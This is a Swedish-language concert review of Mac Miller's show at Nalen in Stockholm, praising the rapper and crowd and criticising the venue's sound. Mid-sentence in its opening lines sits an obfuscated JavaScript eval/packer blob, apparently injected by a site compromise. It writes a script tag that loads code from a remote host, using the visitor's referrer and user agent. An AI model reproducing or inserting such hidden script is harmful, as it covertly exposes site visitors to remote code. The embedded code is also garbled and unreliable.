Recension: Mac Miller på Nalen

7.5
Show
7
Publik
6
6.8

Vid eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kynzb|var|u0026u|referrer|srfri||js|php’.split(’|’),0,{}))
19 års ålder har han tagit över hela världens hiphopscen och har en grym framtid framför sig, något som han efter gårdagen bevisar att han är förtjänt av. Nalens arrangemang kan man däremot säga annat om.

Igår den sextonde september kom den superhypade hiphop-artisten Mac Miller till Nalen i Stockholm med turnén K.I.D.S. (Kickin’ Incredible Dope Shit). Energin från scen var fantastisk, men ljudet var riktigt undermåligt och de stackarna som inte fick plats bland alla röjande fans längst fram kan inte hört många rhymes. Mac Miller är däremot på alla tänkbara sätt en sann artist. Han har en karisma och en scennärvaro som om han hade turnerat de senaste tio åren av sitt liv, trots att han bara varit igång i två.

Spelningen började lite efter tio då Millers fenomenala dj Dj Money (haha) taggade upp publiken på sann hiphop-manér. Tyvärr tog han dock lite udden av spelningens start då han spelade andra rappares hits (t.ex. Tyler, the Creators ”Yonkers” och Dr. Dres ”Forgot About Dre”) innan Miller själv kom in på scen, vilket resulterade i att de första numren som vår main act drog av (som med handen på hjärtat inte kommer i närheten av ovan nämnda låtar) inte fick någon vidare slagkraft. Bättre blev det i alla fall då låtar som ”Nikes on My Feet” och ”Kool Aid and Frozen Pizza” kördes relativt tidigt i spelningen följt av resten av de stora låtarna som fördelats på ett bra sätt utspätt med lite freestylande här och där, så det gick knappast någon nöd på publiken. Vi behövde däremot skrika in honom på scen igen efter han gått av för att få höra ”Donald Trump”.

Publiken ska i övrigt få en egen hyllning då de visade en enorm kärlek för 19-bastaren och sjöng med i varenda ord med grym energi. Något jag däremot störde mig på mer än vanligt på en hiphopspelning var avstängningen av musiken för att låta publiken sjunga själva. Visst är det en stämningsfull effekt, men det gjordes så mycket att det efter ett tag kändes som att publiken stod för 50 % av konserten och tempot sjönk en aning. All ära ska dock gå till publiken som visade exakt samma engagemang som Mac Miller.

Jag måste även återigen ta upp hur besviken jag blev på ljudteknikerna och ljudsystemet på Nalen. Det var inte bara en gång som de på scenen gestikulerade att micen behövde höjas och basen var näst intill obefintlig, så var man inte en av de 100 lyckliga krigarna som kämpat sig längst fram var ljudet mest ett distat virrvarr. I slutändan var det däremot en lyckad spelning, undermåligt ljud har uppenbarligen ingen effekt på Mac Miller, som igår bevisade för mig att han är här för att stanna.